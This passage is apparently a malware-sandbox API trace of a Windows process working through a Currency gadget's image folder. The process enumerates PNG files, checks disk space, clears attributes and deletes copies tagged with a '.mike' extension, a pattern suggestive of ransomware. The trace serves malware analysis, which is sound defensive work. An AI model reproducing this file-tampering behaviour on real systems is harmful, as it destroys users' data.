FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8637267a, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x8637267a, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x29a7ffd3, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xb71, dwReserved0=0x0, dwReserved1=0x0, cFileName="graph_up.png", cAlternateFileName="")) returned 1 [0104.035] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8640abee, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x8640abee, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x29acc28f, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x2d9, dwReserved0=0x0, dwReserved1=0x0, cFileName="info.png", cAlternateFileName="")) returned 1 [0104.035] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x863e4a91, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x863e4a91, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x29af23ed, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xbda, dwReserved0=0x0, dwReserved1=0x0, cFileName="row_over.png", cAlternateFileName="")) returned 1 [0104.035] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x862da106, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x862da106, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x29af23ed, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xb0f, dwReserved0=0x0, dwReserved1=0x0, cFileName="triangle.png", cAlternateFileName="")) returned 1 [0104.035] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0104.042] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0104.047] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\activity16v.png", dwFileAttributes=0x80) returned 0 [0104.048] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\activity16v.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\currency.gadget\\images\\activity16v.png.mike")) returned 1 [0104.050] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0104.054] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\add_down.png", dwFileAttributes=0x80) returned 0 [0104.055] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\add_down.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\currency.gadget\\images\\add_down.png.mike")) returned 1 [0104.057] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0104.061] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\add_over.png", dwFileAttributes=0x80) returned 0 [0104.062] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\add_over.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\currency.gadget\\images\\add_over.png.mike")) returned 1 [0104.063] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0104.067] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\add_up.png", dwFileAttributes=0x80) returned 0 [0104.067] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\add_up.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\currency.gadget\\images\\add_up.png.mike")) returned 1 [0104.069] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0104.075] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\base-docked.png", dwFileAttributes=0x80) returned 0 [0104.076] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\base-docked.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\currency.gadget\\images\\base-docked.png.mike")) returned 1 [0104.078] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0104.085] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\base-undocked-2.png", dwFileAttributes=0x80) returned 0 [0104.086] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\base-undocked-2.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\currency.gadget\\images\\base-undocked-2.png.mike")) returned 1 [0104.088] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0104.098] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\base-undocked-3.png", dwFileAttributes=0x80) returned 0 [0104.099] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\base-undocked-3.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\currency.gadget\\images\\base-undocked-3.png.mike")) returned 1 [0104.101] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0104.110] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\base-undocked-4.png", dwFileAttributes=0x80) returned 0 [0104.110] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\base-undocked-4.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\currency.gadget\\images\\base-undocked-4.png.mike")) returned 1 [0104.112] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0104.116] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\combo-hover-left.png", dwFileAttributes=0x80) returned 0 [0104.117] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\combo-hover-left.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\currency.gadget\\images\\combo-hover-left.png.mike")) returned 1 [0104.120] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0104.124] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\combo-hover-middle.png", dwFileAttributes=0x80) returned 0 [0104.124] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\combo-hover-middle.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\currency.gadget\\images\\combo-hover-middle.png.mike")) returned 1 [0104.126] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0104.130] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\combo-hover-right.png", dwFileAttributes=0x80) returned 0 [0104.131] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\combo-hover-right.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\currency.gadget\\images\\combo-hover-right.png.mike")) returned 1 [0104.133] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0104.137] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\delete_down.png", dwFileAttributes=0x80) returned 0 [0104.138] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\delete_down.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\currency.gadget\\images\\delete_down.png.mike")) returned 1 [0104.140] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0104.144] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\delete_over.png", dwFileAttributes=0x80) returned 0 [0104.144] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\delete_over.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\currency.gadget\\images\\delete_over.png.mike")) returned 1 [0104.146] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0104.150] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\delete_up.png", dwFileAttributes=0x80) returned 0 [0104.151] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\delete_up.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\currency.gadget\\images\\delete_up.png.mike")) returned 1 [0104.153] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0104.158] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\graph_down.png", dwFileAttributes=0x80) returned 0 [0104.159] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\graph_down.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\currency.gadget\\images\\graph_down.png.mike")) returned 1 [0104.161] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0104.166] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\graph_over.png", dwFileAttributes=0x80) returned 0 [0104.166] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\graph_over.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\currency.gadget\\images\\graph_over.png.mike")) returned 1 [0104.168] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0104.172] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\graph_up.png", dwFileAttributes=0x80) returned 0 [0104.173] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\graph_up.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\currency.gadget\\images\\graph_up.png.mike")) returned 1 [0104.175] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0104.180] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\info.png", dwFileAttributes=0x80) returned 0 [0104.180] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\info.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\currency.gadget\\images\\info.png.mike")) returned 1 [0104.183] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0104.187] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\row_over.png", dwFileAttributes=0x80) returned 0 [0104.187] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\row_over.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\currency.gadget\\images\\row_over.png.mike")) returned 1 [0104.189] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0104.193] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\triangle.png", dwFileAttributes=0x80) returned 0 [0104.194] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\triangle.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\currency.gadget\\images\\triangle.png.mike")) returned 1 [0104.195] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7647780, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x7647780, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0104.195] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8640abee, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x8640abee, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x296c7da5, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x3129, dwReserved0=0x0, dwReserved1=0x0, cFileName="activity16v.png", cAlternateFileName="")) returned 1 [0104.195] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x863263c0, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x863263c0, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x296c7da5, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x200, dwReserved0=0x0, dwReserved1=0x0, cFileName="add_down.png", cAlternateFileName="")) returned 1 [0104.195] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x863263c0, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x863263c0, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x296edf03, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x1a4, dwReserved0=0x0, dwReserved1=0x0, cFileName="add_over.png", cAlternateFileName="")) returned 1 [0104.196] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x86300263, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x86300263, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x296edf03, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xe4, dwReserved0=0x0, dwReserved1=0x0, cFileName="add_up.png", cAlternateFileName="")) returned 1 [0104.196] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x862b3fa9, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x862b3fa9, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x29714061, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x406b, dwReserved0=0x0, dwReserved1=0x0, cFileName="base-docked.png", cAlternateFileName="")) returned 1 [0104.196] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x29714061, ftCreationTime.dwHighDateTime=0x1c9ea0e, ftLastAccessTime.dwLowDateTime=0x29714061, ftLastAccessTime.dwHighDateTime=0x1c9ea0e, ftLastWriteTime.dwLowDateTime=0x29714061, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xaa66, dwReserved0=0x0, dwReserved1=0x0, cFileName="base-undocked-2.png", cAlternateFileName="")) returned 1 [0104.196] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x86267cef, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x86267cef, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x29714061, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xd31a, dwReserved0=0x0, dwReserved1=0x0, cFileName="base-undocked-3.png", cAlternateFileName="")) returned 1 [0104.196] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8628de4c, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x8628de4c, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x2973a1bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xf240, dwReserved0=0x0, dwReserved1=0x0, cFileName="base-undocked-4.png", cAlternateFileName="")) returned 1 [0104.196] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x863987d7, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x863987d7, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x29a0dbb9, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xb93, dwReserved0=0x0, dwReserved1=0x0, cFileName="combo-hover-left.png", cAlternateFileName="")) returned 1 [0104.196] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x863be934, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x863be934, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x29a0dbb9, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xb45, dwReserved0=0x0, dwReserved1=0x0, cFileName="combo-hover-middle.png", cAlternateFileName="")) returned 1 [0104.196] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x863be934, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x863be934, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x29a0dbb9, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xba3, dwReserved0=0x0, dwReserved1=0x0, cFileName="combo-hover-right.png", cAlternateFileName="")) returned 1 [0104.196] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8634c51d, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x8634c51d, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x29a33d17, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x304, dwReserved0=0x0, dwReserved1=0x0, cFileName="delete_down.png", cAlternateFileName="")) returned 1 [0104.196] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8634c51d, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x8634c51d, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x29a33d17, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x2b8, dwReserved0=0x0, dwReserved1=0x0, cFileName="delete_over.png", cAlternateFileName="")) returned 1 [0104.196] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8634c51d, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x8634c51d, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x29a59e75, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x1dd, dwReserved0=0x0, dwReserved1=0x0, cFileName="delete_up.png", cAlternateFileName="")) returned 1 [0104.197] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x863987d7, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x863987d7, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x29a59e75, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xcc4, dwReserved0=0x0, dwReserved1=0x0, cFileName="graph_down.png", cAlternateFileName="")) returned 1 [0104.197] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8637267a, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x8637267a, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x29a59e75, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xd64, dwReserved0=0x0, dwReserved1=0x0, cFileName="graph_over.png", cAlternateFileName="")) returned 1 [0104.197] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8637267a, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x8637267a, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x29a7ffd3, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xb71, dwReserved0=0x0, 